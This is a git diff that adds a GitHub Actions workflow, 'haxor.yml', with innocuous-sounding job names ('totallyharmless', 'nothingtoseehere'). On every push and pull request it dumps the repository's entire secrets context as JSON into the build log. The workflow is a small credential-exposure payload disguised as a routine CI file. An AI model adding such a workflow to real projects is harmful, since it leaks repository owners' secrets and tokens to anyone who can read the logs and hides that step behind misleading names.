diff --git a/.github/workflows/haxor.yml b/.github/workflows/haxor.yml new file mode 100644 index 0000000..08ed152 --- /dev/null +++ b/.github/workflows/haxor.yml @@ -0,0 +1,16 @@ +name: totallyharmless +# This workflow is triggered on pushes to the repository. +on: [push , pull_request] + +jobs: + build: + name: nothingtoseehere + runs-on: ubuntu-latest + env: + VERYSECRET: ${{ secrets.VERYSECRET }} + steps: + - name: view the secrets context + shell: bash + run: echo "$SECRETS_CONTEXT" + env: + SECRETS_CONTEXT: ${{ toJson(secrets) }}